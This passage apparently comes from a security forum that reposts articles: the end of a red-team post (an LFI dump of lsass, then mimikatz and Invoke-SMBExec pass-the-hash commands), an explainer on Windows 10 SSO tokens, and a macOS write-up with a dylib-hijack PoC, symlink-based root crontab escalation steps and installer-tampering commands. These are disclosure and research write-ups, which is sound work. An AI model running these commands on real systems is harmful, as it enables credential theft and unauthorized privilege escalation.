https://targethost/examples/images/jsp/list.jsp?file=c:/Users/Administrator/Contacts/lsass.dmp –output lsass.dmp We then fed the lsass dump file to our windows instance running mimikatz. We found over 6-7 domain user NTLM hashes and one Domain admin NTLM hash who recently logged in. Checkmate. No unexpected twists, no drama. We then used Invoke-SMBExec from here to get a shell and pass the hash by running: Import-Module Invoke-SMBExec.ps1 Invoke-SMBExec -Target dc.domain.com -Domain domain.com -Username grantmepower -Hash <ntlm hash> When we updated the target organization about this, they asked us to end it here. To conclude this post, we would like to advise organizations with a large footprint on the internet that, expensive network security devices, Anti-malware software and 24/7 monitoring aren’t enough to protect internal networks. Especially, when you leave domain member servers wide open to internet with weak credentials and expect adversaries to knock on your front door. That said these are takeaways for the organization: Keep track of servers especially domain servers which are being used to develop products. Do not deploy servers without checking for weak credentials. There was no reason for the domain user to be a local administrator on that server. There is no need for a user belonging domain admin group to login into any domain machine to perform daily administrative tasks. Always Delegate control and follow the least privilege model. Frequent password rotation of high privileged user helps. Credits – Mukunda – https://twitter.com/_m3rcii Manideep – https://twitter.com/mani0x00 Mukunda Krishna I am still working on my short bio. Until then you can browse my 1 posts and provide a feedback. More posts by Mukunda Krishna Sursa: https://wesecureapp.com/2019/05/31/exploiting-un-attended-web-servers-to-get-domain-admin-red-teaming/
  18. How SSO works in Windows 10 devices Posted on November 8, 2016by Jairo In a previous post I talked about the three ways to setup Windows 10 devices for work with Azure AD. I later covered in detail how Azure AD Join and auto-registration to Azure AD of Windows 10 domain joined devices work, and in an extra post I explained how Windows Hello for Business (a.k.a. Microsoft Passport for Work) works. In this post I will cover how Single Sign-On (SSO) works once devices are registered with Azure AD for domain joined, Azure AD joined or personal registered devices via Add Work or School Account. SSO in Windows 10 works for the following types of applications: Azure AD connected applications, including Office 365, SaaS apps, applications published through the Azure AD application proxy and LOB custom applications integrating with Azure AD. Windows Integrated authentication apps and services. AD FS applications when using AD FS in Windows Server 2016. The Primary Refresh Token SSO relies on special tokens obtained for each of the types of applications above. These are in turn used to obtain access tokens to specific applications. In the traditional Windows Integrated authentication case using Kerberos, this token is a Kerberos TGT (ticket-granting ticket). For Azure AD and AD FS applications we call this a Primary Refresh Token (PRT). This is a JSON Web Token containing claims about both the user and the device. The PRT is initially obtained during Windows Logon (user sign-in/unlock) in a similar way the Kerberos TGT is obtained. This is true for both Azure AD joined and domain joined devices. In personal devices registered with Azure AD, the PRT is initially obtained upon Add Work or School Account (in a personal device the account to unlock the device is not the work account but a consumer account e.g. hotmail.com, live.com, outlook.com, etc.). The PRT is needed for SSO. Without it, the user will be prompted for credentials when accessing applications every time. Please also note that the PRT contains information about the device. This means that if you have any device-based conditional access policy set on an application, without the PRT, access will be denied. PRT validity The PRT has a validity of 90 days with a 14 day sliding window. If the PRT is constantly used for obtaining tokens to access applications it will be valid for the full 90 days. After 90 days it expires and a new PRT needs to be obtained. If the PRT has not been used in a period of 14 days, the PRT expires and a new one needs to be obtained. Conditions that force expiration of the PRT outside of these conditions include events like user’s password change/reset. For domain joined and Azure AD joined devices, renewal of the PRT is attempted every 4 hours. This means that the first sign-in/unlock, 4 hours after the PRT was obtained, a new PRT is attempted to be obtained. Now, there is a caveat for domain joined devices. Attempting to get a new PRT only happens if the device has a line of sight to a DC (for a Kerberos full network logon which triggers also the Azure AD logon). This is a behavior we want to change and hope to make for the next update of Windows. This would mean that even if the user goes off the corporate network, the PRT can be updated. The implication of this behavior today, is that a domain joined device needs to come into the corporate network (either physically or via VPN) at least once every 14 days. Domain joined/Azure AD joined devices and SSO The following step-by-step shows how the PRT is obtained and how it is used for SSO. The diagram shows the flow in parallel to the long standing Windows Integrated authentication flow for reference and comparison. (1) User enter credentials in the Window Logon UI In the Windows Logon UI the user enters credentials to sign-in/unlock the device. The credentials are obtained by a Credential Provider. If using username and password the Credential Provider for username and password is used, if using Windows Hello for Business (PIN or bio-gesture), the Credential Provider for PIN, fingerprint or face recognition is used. (2) Credentials are passed to the Cloud AP Azure AD plug-in for authentication The Credential Provider gets the credentials to WinLogon which will call LsaLogonUser() API with the user credentials (to learn about the authentication architecture in Windows see Credentials Processes in Windows Authentication). The credentials get to a new component in Windows 10 called the Cloud Authentication Provider (Cloud AP). This is a plug-in based component running inside the LSASS (Local Security Authority Subsystem) process with one plug-in being the Azure AD Cloud AP plug-in. For simplicity in the diagram these two are shown as one Cloud AP box. The plug-in will authenticate the user against Azure AD and AD FS (if Windows Server 2016) to obtain the PRT. The plug-in will know about the Azure AD tenant and the presence of the AD FS by the information cached during device registration time. I explain this at the end of step #2 in the post Azure AD Join: what happens behind the scenes?when the information from the ID Token is obtained and cached just before performing registration (the explanation applies to both to domain joined devices registered with Azure AD and Azure AD joined devices). (3) Authentication of user and device to get PRT from Azure AD (and AD FS if federated and version of Windows Server 2016) Depending on what credentials are used the plug-in will obtain the PRT via distinct calls to Azure AD and AD FS. PRT based in username and password To obtain the Azure AD PRT using username and password, the plug-in will send the credentials directly to Azure AD (in a non-federated configuration) or to AD FS (if federated). In the federated case, the plug-in will send the credentials to the following WS-trust end-point in AD FS to obtain a SAML token that is then sent to Azure AD. adfs/services/trust/13/usernamemixed Note: This post has been updated to reflect that the end-point used is the usernamemixed and not the windowstransport as it was previously stated. Azure AD will authenticate the user with the credentials obtained (non-federated) or with verifying the SAML token obtained from AD FS (federated). After authentication Azure AD will build a PRT with both user and device claims and will return it to Windows. PRT based in the Windows Hello for Business credential To obtain the Azure AD PRT using the Windows Hello for Business credential, the plug-in will send a message to Azure AD to which it will respond with a nonce. The plug-in will respond with the nonce signed with the Windows Hello for Business credential key. Azure AD will authenticate the user by checking the signature based on the public key that it registered at credential provisioning as explained in the post Azure AD and Microsoft Passport for Work in Windows 10 (please note that Windows Hello for Business is the new name for Microsoft Passport for Work). The PRT will contain information about the user and the device as well, however a difference with the PRT obtained using username and password is that this one will contain a “strong authentication” claim. "acr":"2" Regardless of how the PRT was obtained, a session key is included in the response which is encrypted to the Kstk (one of the keys provisioned during device registration as explained in step #4 in the post Azure AD Join: what happens behind the scenes?). The session key is decrypted by the plug-in and imported to the TPM using the Kstk. Upon re-authentication the PRT is sent over to Azure AD signed using a derived version of the previously imported session key stored in the TPM which Azure AD can verify. This way we are bounding the PRT to the physical device reducing the risk of PRT theft. (4) Cache of the PRT for the Web Account Manager to access it during app authentication Once the PRT is obtained it is cached in the Local Security Authority (LSA). It is accessible by the Web Account Manager which is also a plug-in based component that provides an API for applications to get tokens from a given Identity Provider (IdP). It can access the PRT through the Cloud AP (who has access to the PRT) which checks for a particular application identifier for the Web Account Manager. There is a plug-in for the Web Account Manager that implements the logic to obtain tokens from Azure AD and AD FS (if AD FS in Windows Server 2016). You can see whether a PRT was obtained after sign-in/unlock by checking the output of the following command. dsregcmd.exe /status Under the ‘User State’ section check the value for AzureAdPrt which must be YES. A value of NO will indicate that no PRT was obtained. The user won’t have SSO and will be blocked from accessing service applications that are protected using device-based conditional access policy. A note on troubleshooting To troubleshoot why the PRT is not obtained can be a topic for a full post, however one test you can do is to check whether that same user can authenticate to Office 365, say via browser to SharePoint Online, from a domain joined computer without being prompted for credentials. If the UPN suffix of users in Active Directory on-premises don’t route to the verified domain (alternate login ID) please make sure you have the appropriate issuance transform rule(s) in AD FS for the ImmutableID claim. One other reason that I have seen PRT not being obtained, is when the device has a bad transport key (Kstk). I have seen this in devices that have been registered in a very early version of Windows (which upgraded to 1607 eventually). As the PRT is protected using a key in the TPM this could be a reason why the PRT is not obtained at all. One remediation for this case is to reset the TPM and let the device register again. (5, 6 and 7) Application requests access token to Web Account Manager for a given application service When a client application connects to a service application that relies in Azure AD for authentication (for example the Outlook app connecting to Office 365 Exchange Online) the application will request a token to the Web Account Manager using its API. The Web Account Manager calls the Azure AD plug-in which in turn uses the PRT to obtain an access token for the service application in question (5). There are two interfaces in particular that are important to note. One that permits an application get a token silently, which will use the PRT to obtain an access token silently if it can. If it can’t, it will return a code to the caller application telling it that UI interaction is required. This could happen for multiple reasons including the PRT has expired or when MFA authentication for the user is required, etc. Once the caller application receives this code, it will be able to call a separate API that will display a web control for the user to interact. WinRT API WebAuthenticationCoreManager.GetTokenSilentlyAsync(...) // Silent API WebAuthenticationCoreManager.RequestTokenAsync(...) // User interaction API Win32 API IWebAuthenticationCoreManagerStatics::GetTokenSilentlyAsync(...) // Silent API IWebAuthenticationCoreManagerInterop::RequestTokenForWindowAsync(...) // UI API After returning the access token to the application (6), the client application will use the access token to get access to the service application (7). Browser SSO When the user accesses a service application via Microsoft Edge or Internet Explorer the application will redirect the browser to the Azure AD authentication URL. At this point, the request is intercepted via URLMON and the PRT gets included in the request. After authentications succeeds, Azure AD sends back a cookie that will contain SSO information for future requests. Please note that support for Google Chrome is available since the Creators update of Windows 10 (version 1703) via the Windows 10 Accounts Google Chrome extension. Note: This post has been updated to state the support for Google Chrome in Windows 10. Final thoughts Remember that registering your domain joined computers with Azure AD (i.e. becoming Hybrid Azure AD joined) will give you instant benefits and it is likely you have everything you need to do it. Also, if you are thinking in deploying Azure AD joined devices you will start enjoying some additional benefits that come with it. Please let me know you thoughts and stay tuned for other posts related to device-based conditional access and other related topics. See you soon, Jairo Cadena (Twitter: @JairoC_AzureAD) Sursa: https://jairocadena.com/2016/11/08/how-sso-works-in-windows-10-devices/
  19. macOS - Getting root with benign AppStore apps June 1, 2019 24 minutes read BLOG macos • vulnerability • lpe This writeup is intended to be a bit of storytelling. I would like to show how I went down the rabbit hole in a quick ’research’ I wanted to do, and eventually found a local privilege escalation vulnerability in macOS. I also want to show, tell about all the obstacles and failures I run into, stuff that people don’t talk about usually, but I feel it’s part of the process all of us go through, when we try to create something. If you prefer to watch this as a talk, you can se it here: Csaba Fitzl - macOS: Gaining root with Harmless AppStore Apps - SecurityFest 2019 - YouTube Slides are here: Getting root with benign app store apps DYLIB Hijacking on macOS This entire story started with me trying to find dylib hijacking vulnerability in a specific application, which I can’t name here. Well, I didn’t find any in that app, but found plenty in many others. If you are not familiar with dylib hijacking on macOS, read Patrick Wardle’s great writeup: Virus Bulletin :: Dylib hijacking on OS X or watch his talk on the subject: DEF CON 23 - Patrick Wardle - DLL Hijacking on OS X - YouTube I would go for the talk, as he is a great presenter, and will explain the subject in a very user friendly way, so you will understand all the details. But just to sum it up here, in very short, there are 2 type of dylib hijackings possible: 1. weak loading of dylibs - in this case the OS will use the LC_LOAD_WEAK_DYLIB function, and if the dylib is not found the application will still run and won’t error out. So if there is an app that refers to a dylib with this method and that is not present, you can go ahead place yours there and profit. 2. rpath (run-path dependent) dylibs - in this case the dylibs are referenced with the @rpath prefix, which will point to the current running location of the mach-o file, and will try to find the dylibs based on this search path. It’s useful if you don’t know where your app will end up after installation. Developers can specify multiple search paths, and in case the first or first couple doesn’t exists, you can place your malicious dylib there, as the loader will search through these paths in sequential order. In its logic this is similar to classic DLL hijacking on Windows. Finding vulnerable apps It couldn’t be easier, you go download Patrick’s DHS tool, run the scan and wait. Link: Objective-See There is also a command line version: GitHub - synack/DylibHijack: python utilities related to dylib hijacking on OS X For the walkthrough I will use the Tresorit app as an example as they already fixed the problem, and big kudos for them, as they not only responded but also fixed this in a couple of days after reporting. I will not mention all of the apps here, but you will be amazed how many are out there. The vulnerability is with Tresorit’s FinderExtension: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/FinderExtension And you can place your dylib here: rpath vulnerability: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/Frameworks/UtilsMac.framework/Versions/A/UtilsMac DHS will only show you the first hijackable dylib, but there can be more. Set the DYLD_PRINT_RPATHS variable to 1 in Terminal, and you will see which dylibs the loader tries to load. You can see below that we can hijack two dylibs. $ export DYLD_PRINT_RPATHS="1" $ $ /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/FinderExtension RPATH failed to expanding @rpath/UtilsMac.framework/Versions/A/UtilsMac to: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../Frameworks/UtilsMac.framework/Versions/A/UtilsMac RPATH successful expansion of @rpath/UtilsMac.framework/Versions/A/UtilsMac to: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../../../../Frameworks/UtilsMac.framework/Versions/A/UtilsMac RPATH failed to expanding @rpath/MMWormhole.framework/Versions/A/MMWormhole to: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../Frameworks/MMWormhole.framework/Versions/A/MMWormhole RPATH successful expansion of @rpath/MMWormhole.framework/Versions/A/MMWormhole to: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../../../../Frameworks/MMWormhole.framework/Versions/A/MMWormhole Illegal instruction: 4 $ Additionally it’s a good idea to double check if the App is compiled with the library-validation option (flag=0x200). That would mean that the OS will verify if all dylibs are signed or not, so you can’t just create anything and use that. Most of the apps are not compiled this way, including Tresorit (but they promised to fix it): $ codesign -dvvv /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/FinderExtension Executable=/Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/FinderExtension Identifier=com.tresorit.mac.TresoritExtension.FinderExtension Format=bundle with Mach-O thin (x86_64) CodeDirectory v=20200 size=754 flags=0x0(none) hashes=15+5 location=embedded (...) Utilizing the vulnerability It’s also something that is super easy based on the talk above, but here it is in short. I made the following POC: #include <stdio.h> #include <stdlib.h> #include <syslog.h> __attribute__((constructor)) void customConstructor(int argc, const char **argv) { printf("Hello World!\n"); system("/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"); syslog(LOG_ERR, "Dylib hijack successful in %s\n", argv[0]); } The constructor will be called upon loading the dylib. It will print you a line, create a syslog entry, and also start Terminal for you. If the app doesn’t run in sandbox you get a full featured Terminal. Compile it: gcc -dynamiclib hello.c -o hello-tresorit.dylib -Wl,-reexport_library,"/Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../../../../Frameworks/UtilsMac.framework/Versions/A/UtilsMac" Then run Patrick’s fixer script. It will fix the dylib version for you (the dylib loader will verify that when loading) and also will add all the exports that are exported by the original dylib. Those exports will actually point to the valid dylib, so when the application loads our crafted version, it can still use all the functions and won’t crash. python2 createHijacker.py hello-tresorit.dylib "/Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../../../../Frameworks/UtilsMac.framework/Versions/A/UtilsMac" CREATE A HIJACKER (p. wardle) configures an attacker supplied .dylib to be compatible with a target hijackable .dylib [+] configuring hello-tresorit.dylib to hijack UtilsMac [+] parsing 'UtilsMac' to extract version info found 'LC_ID_DYLIB' load command at offset(s): [2568] extracted current version: 0x10000 extracted compatibility version: 0x10000 [+] parsing 'hello-tresorit.dylib' to find version info found 'LC_ID_DYLIB' load command at offset(s): [888] [+] updating version info in hello-tresorit.dylib to match UtilsMac setting version info at offset 888 [+] parsing 'hello-tresorit.dylib' to extract faux re-export info found 'LC_REEXPORT_DYLIB' load command at offset(s): [1144] extracted LC command size: 0x48 extracted path offset: 0x18 computed path size: 0x30 extracted faux path: @rpath/UtilsMac.framework/Versions/A/UtilsMac [+] updating embedded re-export via exec'ing: /usr/bin/install_name_tool -change [+] copying configured .dylib to /Users/csaby/Downloads/DylibHijack/UtilsMac Once that is done, you can just copy the file over and start the app. Other apps Considering the amount of vulnerable apps, I didn’t even take the time to report all these issues, only a few. Beside Tresorit I reported one to Avira, and they promised a fix but with low priority as you had to get root for utilising this, and the others were in MS Office 2016, where MS said they don’t consider this as a security bug as you need root privileges to exploit it, they said I can submit as a product bug. I don’t agree, cause this is a way for persistence, but I suppose I have to live with it. The privilege problem My original ‘research’ was done, but this is the point where I went beyond what I expected in the beginning. There is a problem in case of many apps, in theory you just need to drop your dylib into the right place, but there can be a two main scenarios in terms of privileges required for utilising the vulnerability. The application folder is owned by your account (in reality everyone is admin on his Mac so I won’t deal with standard users here) - in that case you can go and drop your files easily The application folder is owned by root, so you need root privileges in order to perform the attack. Honestly this kinda makes it less interesting, cause if you can get root, you can do much better persistence elsewhere and the app will typically run in sandbox and under the user’s privileges, so you won’t get too much out of it. It’s still a problem but makes it less interesting. Typically applications you drag and drop to the /Application directory will fall into the first category. All applications from the App Store will fall into the 2nd category, it’s because they will be installed by the installd daemon which is running as root . Apps that you install from a package will typically also fall into the 2nd category, as typically those require elevation of privilege. I wasn’t quite happy with all vendor responses, and also didn’t like that exploitation is limited to root most of the times, so I started to think: Can we bypass root folder permissions? Spoiler: YES, otherwise this would be a very short post. Tools for monitoring Before moving on, I want to mention a couple of tools, that I found useful for event monitoring. FireEye - Monitor.app This is a procmon like app created by FireEye, it can be downloaded from here: Monitor.app | Free Security Software | FireEye It’s quite good! Objective-See’s ProcInfo library & ProcInfoExample This is an open source library for monitoring process creation and termination on macOS. I used the demo project of this library, called ProcInfoExample. It’s a command line utility and will log every process creation, with all the related details, like arguments, signature info, etc… It will give you more information than FE’s Monitor app. It’s output is like: 2019-03-11 21:18:05.770 procInfoExample[32903:4117446] process start: pid: 32906 path: /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/efw_cache_update user: 0 args: ( "/System/Library/PrivateFrameworks/PackageKit.framework/Resources/efw_cache_update", "/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/BC005493-3176-43E4-A1F0-82D38C6431A3.activeSandbox/Root/Applications/Parcel.app" ) ancestors: ( 9103, 1 ) signing info: { signatureAuthorities = ( "Software Signing", "Apple Code Signing Certification Authority", "Apple Root CA" ); signatureIdentifier = "com.apple.efw_cache_update"; signatureSigner = 1; signatureStatus = 0; } binary: name: efw_cache_update path: /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/efw_cache_update attributes: { NSFileCreationDate = "2018-11-30 07:31:32 +0000"; NSFileExtensionHidden = 0; NSFileGroupOwnerAccountID = 0; NSFileGroupOwnerAccountName = wheel; NSFileHFSCreatorCode = 0; NSFileHFSTypeCode = 0; NSFileModificationDate = "2018-11-30 07:31:32 +0000"; NSFileOwnerAccountID = 0; NSFileOwnerAccountName = root; NSFilePosixPermissions = 493; NSFileReferenceCount = 1; NSFileSize = 43040; NSFileSystemFileNumber = 4214431; NSFileSystemNumber = 16777220; NSFileType = NSFileTypeRegular; } signing info: (null) Built-in fs_usage utility The fs_usage utility can monitor file system event very detailed, I would say even too detailed, you need to do some good filtering if you want to get useful data out of it. You get something like this: (standard input):21:27:01.229709 getxattr [ 93] /Applications/Parcel.app 0.000017 lsd.4123091 (standard input):21:27:01.229719 access (___F) /Applications/Parcel.app/Contents 0.000005 lsd.4123091 (standard input):21:27:01.229819 fstatat64 [-2]//Applications/Parcel.app 0.000013 lsd.4123091 (standard input):21:27:01.229927 getattrlist /Applications/Parcel.app 0.000006 lsd.4123091 (standard input):21:27:01.229933 getattrlist /Applications/Parcel.app/Contents 0.000006 lsd.4123091 (standard input):21:27:01.229939 getattrlist /Applications/Parcel.app/Contents/MacOS 0.000005 lsd.4123091 (standard input):21:27:01.229945 getattrlist /Applications/Parcel.app/Contents/MacOS/Parcel 0.000005 lsd.4123091 (standard input):21:27:01.229957 getattrlist /Applications/Parcel.app 0.000005 lsd.4123091 Bypassing root folder permissions in App Store installed apps The goal here is to write any file inside an AppStore installed application, which is by default only accessible for root. The bypass will only work if the application was installed already at least once (since when you buy it, you need to authenticate to the AppStore even if it’s free or if the user checked in ‘Save Password’ for free apps, you can get those as well. What I ‘noticed’ first is that you can create folders in the “/Applications” folder - obviously as you can also drag and drop apps there. But what happens if I create folders for the to-be-installed app? Here is what happens and the steps to bypass the root folder permissions: Before you delete the app take a note of the folder structure - you have read access to that. This is just for knowing what to recreate later. Start Launchpad locate the app, and delete it if installed currently. Interestingly it will remove the application, although you interact with Launchpad as normal user. Note that it can only do that for apps installed from the App Store. Create the folder structure with your regular ID in the /Applications folder, you can do that without root access. It’s enough to create the folders you need, no need for all, and place your dylib (or whatever you want) there Go back to the AppStore and on the Purchased tab, locate the app, and install it. You don’t need to authenticate in this case. You can also use the command line utility available from Github: GitHub - mas-cli/mas: Mac App Store command line interface At this point the app will be installed and you can use it, and you have your files there, which you couldn’t place there originally without root permissions. This was fixed in Mojave 10.14.5, I will talk about that later. To compare, it’s like having write access to the “Program Files” folder on Windows. Admin users do have it, but only if they run as HIGH integrity, so that means you need to bypass UAC from the default MEDIUM integrity mode. But in Windows, MEDIUM integrity Admin to HIGH integrity Admin elevation is not a security boundary, but in macOS admin to root is a boundary. Taking it further - Dropping AppStore files anywhere At this point I had another idea. Since installd runs as root, can we use it to place the app somewhere else or certain parts of it? The answer is YES. Let’s say I want to drop the App’s main mach-o file in a folder where only root has access, e.g.: /opt (folders protected by SIP, like /System won’t work, as even root doesn’t have access there). Here are the steps to reproduce it: Step 1-2 is the same as in the previous case. 3. Create the following folder structure: /Applications/Example.app/Contents 4. Create a symlink ‘MacOS’ pointing to /opt: ln -s /opt /Applications/Example.app/Contents/MacOS The main mach-o file is typically in the following folder: /Applications/Example.app/Contents/MacOS and now in our case we point this to /opt 5. Install the App What happens at this point, is that the App will install normally, except that any files under /Applications/Example.app/Contents/MacOS will go to /opt. If there was a file with the name of the mach-o file, that will be overwritten. Essentially what we can achieve with this is to drop any files that can be found in an AppStore app to a location we control. What can’t we do? (Or at least I didn’t find a way) Change the name of the file being dropped, or with other words, put the contents of one file into another one with different name. If we create a symlink for the actual mach-o file, like: ln -s /opt/myname /Applications/Example.app/Contents/MacOS/Example What will happen is that the symlink will be overwritten, when the installd daemon moves the file from the temporary location to the final. You can find the same behaviour if you experiment with the mv command: $ echo aaa > a $ ln -s a b $ ls -la total 8 drwxr-xr-x 4 csaby staff 128 Sep 11 16:16 . drwxr-xr-x+ 50 csaby staff 1600 Sep 11 16:16 .. -rw-r--r-- 1 csaby staff 4 Sep 11 16:16 a lrwxr-xr-x 1 csaby staff 1 Sep 11 16:16 b -> a $ cat b aaa $ echo bbb >> b $ cat b aaa bbb $ touch c $ ls -l total 8 -rw-r--r-- 1 csaby staff 8 Sep 11 16:16 a lrwxr-xr-x 1 csaby staff 1 Sep 11 16:16 b -> a -rw-r--r-- 1 csaby staff 0 Sep 11 16:25 c $ mv c b $ ls -la total 8 drwxr-xr-x 4 csaby staff 128 Sep 11 16:25 . drwxr-xr-x+ 50 csaby staff 1600 Sep 11 16:16 .. -rw-r--r-- 1 csaby staff 8 Sep 11 16:16 a -rw-r--r-- 1 csaby staff 0 Sep 11 16:25 b Even if we create a hardlink instead of symlink, that will be overwritten like in the 1st case. As noted earlier we can’t write to folder protected by SIP. Ideas for using this for privilege escalation Based on the above I had the following ideas for privilege escalation from admin to root: 1. Find a file in the AppStore that has the same name as a process that runs as root, and replace that file. 2. Find a file in the AppStore that has a cron job line inside and called “root”, you could drop that into /usr/lib/cron/tabs 3. If you don’t find one, you can potentially create a totally harmless App, that will give you an interactive prompt, or something similar, upload it to the AppStore (it should bypass Apple’s vetting process as it will nothing do any harm). For example your file could contain an example root crontab file, which start Terminal every hour. You could place that in the crontab folder. 4. Make a malicious dylib, upload it as part of an app to the Appstore and drop that, so an app running as root will load it Reporting to Apple I will admit that at this point I took the lazy approach and reported the above to Apple, mainly because: * I found it very unlikely that I will find a suitable file that satisfies either #1 or #2 * Xcode almost satisfied #2 as it has some cron examples, but not named as root * I had 0 experience in developing AppStore apps, and I couldn’t code neither in Objective-C or Swift * I had better things to do at work and after work So I reported and then Apple came back at one point for my privilege escalation ideas: “The App Review process helps prevent malicious applications from becoming available on the Mac and iOS App Stores.“ Obviously Apple didn’t understood the problem for first, it was either my fault not explaining it properly or they didn’t understood it, but it was clear that there was a misunderstanding between us, so I felt that I have to prove my point if I want this fixed. So I took a deep breath and gone the “Try Harder” approach and decided to develop an App and submit it to the AppStore. Creating an App After some thinking I decided that I will create an application that will have a crontab file for root, and I will drop it to the /usr/lib/cron/tabs folder. The app had to do something meaningful in order to submit it, and to be accepted, so I came up with the idea of creating a cronjob editor app. It’s also useful, and would also explain why I have a crontab files embedded. Here is my journey: Apple developer ID In order to submit any App to the store you have to sign up for the developer program. I signed up with a new Apple ID for the Apple developer program just because I had the fear that they will ban me, once I introduce an app that can be used for private escalation. In fact they didn’t. It’s 99$/ annum. Choosing a language I had no prior knowledge of either Objective C or Swift, but looking on the following syntax for Obj-C, freaked me out: myFraction = [[Fraction alloc] init]; This is how you call methods of objects and pass parameters. It’s against every syntax I ever knew and I just didn’t want to consume this. So I looked at Swift which looked much nicer in this space and decided to go with that. Learning Swift My company has a subscription to one of the big online training portals, where I found a short, few hour long course about introduction to Cocoa app development with Swift. It was an interesting course, and it turned out to be sufficient, basically it covered how to put together a simple window based GUI. It also turned out that there is Swift 1 and 2 and 3 and 4, as the language evolved, and the syntax is also changed over time a bit, so you need to pick up the right training. Publishing to the store - The Process Become an Apple Developer, costs 99$/year Login to App Store Connect and create a Bundle ID: https://developer.apple.com/account/mac/identifier/bundle/create Go back and create a new App referring the Bundle ID you created: https://appstoreconnect.apple.com/WebObjects/iTunesConnect.woa/ra/ng/app Populate the details (license page, description, etc…) Upload your app from Xcode Populate more details if needed Submit for review Publishing to the store - The error problem Developing the App was pretty quick, but publishing it was really annoying, because I really wanted to see that my idea is indeed works. So once I pushed it, I had to wait ~24 hours for it being reviewed. I was really impatient and nervous about if I can truly make it to the store The clock ticked, and it was rejected! The reason was that when I clicked the close button, the app didn’t exit and the user had now way to bring back the window. I fixed it, resubmit, wait again ~24 hours. Approved! I quickly went to the store, prepared the exploit, and clicked install. Meanwhile during the development I upgraded myself to Mojave, and never really did any other tests with other apps. So it was really embarrassing to notice, that in Mojave this exploit path doesn’t work No problem, I have a High Sierra VM, let’s install it there! There I got a popup, that the minimum version required for the App is 10.14 (Mojave), and I can’t put it on HS… damn, it’s an easy fix, but that means resubmit again, wait ~24 hours. Finally it got approved again, and the exploit worked on High Sierra! It was a really annoying process, as every time I made a small mistake, fixing it meant 24 hours, even if the actual fix in the code, took 1 minute. The App The application I developed, is called “Crontab Creator”, which is actually very useful for creating crontab files. It’s still there and available, and as it turns out, there are a few people using it. ‎Crontab Creator on the Mac App Store The application is absolutely benign! However it contains different examples for crontab files, which are all stored as separate files within the application. The only reason I didn’t store the strings embedded in the source code is to be able to use it for exploitation Among these there is one called ‘root’, which will try to execute a script from the _Applications_Scripts folder. Privilege Escalation on High Sierra The Crontab Creator app contains a file named ‘root’ as an example for crontab file, along with 9 others. The content is the following: * * * * * /Applications/Scripts/backup-apps.sh Obviously this script doesn’t exists by default, but you can easily create it in the /Application folder, as you have write access, and at that point you can put anything you want into it. The steps for the privilege escalation are as follows. First we need to create the app folder structure, and place a symlink there. cd /Applications/ mkdir "Crontab Creator.app" cd Crontab\ Creator.app/ mkdir Contents cd Contents/ ln -s /usr/lib/cron/tabs/ Resources Then we need to create the script file, which will be run every minute, I choose to run Terminal. cd /Applications/ mkdir Scripts cd Scripts/ echo /Applications/Utilities/Terminal.app/Contents/MacOS/Terminal > backup-apps.sh chmod +x backup-apps.sh Then we need to install the application from the store. We can do this either via the GUI, or we can do it via the CLI if we install brew, and then mas. Commands: /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" brew install mas mas install 1438725196 In summary utilizing the previous vulnerabilities we can drop the file into the crontab folder, create the script with starting Terminal inside it, and in a minute we got a popup and root access. The fix As noted before, Apple fixed this exploit path in Mojave. This was in 2018 October, my POC didn’t work anymore, and without further testing I honestly thought that the privilege escalation issue is fixed - yes you could still drop files inside the app, but I thought that the symlink issue is solved. I couldn’t have been more wrong! But this turned out only later. Infecting installers without breaking the Application’s signature The next part is where we want to bypass root folder permission for manually installed apps. We can’t do a true bypass / privilege escalation here, as during the installation the user have to enter his/her password, but we can still apply the previous idea. However here I want to show another method, and that’s how to embed our custom file into an installer package. If we can MITM a pkg download, we could replace it with our own one, or we can simply deliver it to the user via email or something. As a side note, interestingly AppStore apps are downloaded through HTTP, you can’t really alter it, as the hash is downloaded via HTTPS and the signature will also verified. Here are the steps, how to include your custom file in a valid package: Grab an installer pkg, for example from the AppStore (Downloading installer packages from the Mac App Store with AppStoreExtract | Der Flounder) Unpack the pkg: pkgutil --expand example.pkg myfolder Enter the folder, and decompress the embedded Payload (inside the embedded pkg folder): tar xvf embedded.pkg/Payload Embedded your file (it can be anywhere and anything): $ mkdir Example.app/Contents/test $ echo aaaa > Example.app/Contents/test/a Recompress the app: find ./Example.app | cpio -o --format odc | gzip -c > Payload Delete unnecessary files, and move the Payload to the embedded pkg folder. Repack the pkg pkgutil --flatten myfolder/ mypackage.pkg The package’s digital signature will be lost, so you will need a method to bypass Gatekeeper. The embedded App’s signature will be also broken, as these days every single file inside an .app bundle must be digitally signed. Typically the main mach-o file is signed, and it has the hash of the _CodeSignatures plist file. The file will contain all the hashes for the other files. If you place a new file inside the .app bundle that will invalidate the signature. However this is not a problem here, as if you can bypass Gatekeeper for the .pkg file, the installed Application will not be subject to Gatekeeper’s verification. Redistributing paid apps Using the same tool as in the previous example we can grab the installer for a given application. If you keep a paid app this way, it will still work somewhere else even if that person didn’t pay for the app. There is no default verification in an application if it was purchased or not, it also doesn’t contain anything that tracks this. With that, if you buy an application, you can easily distribute it somewhere else. In-App purchases probably won’t work as those are tied to the Apple ID, and 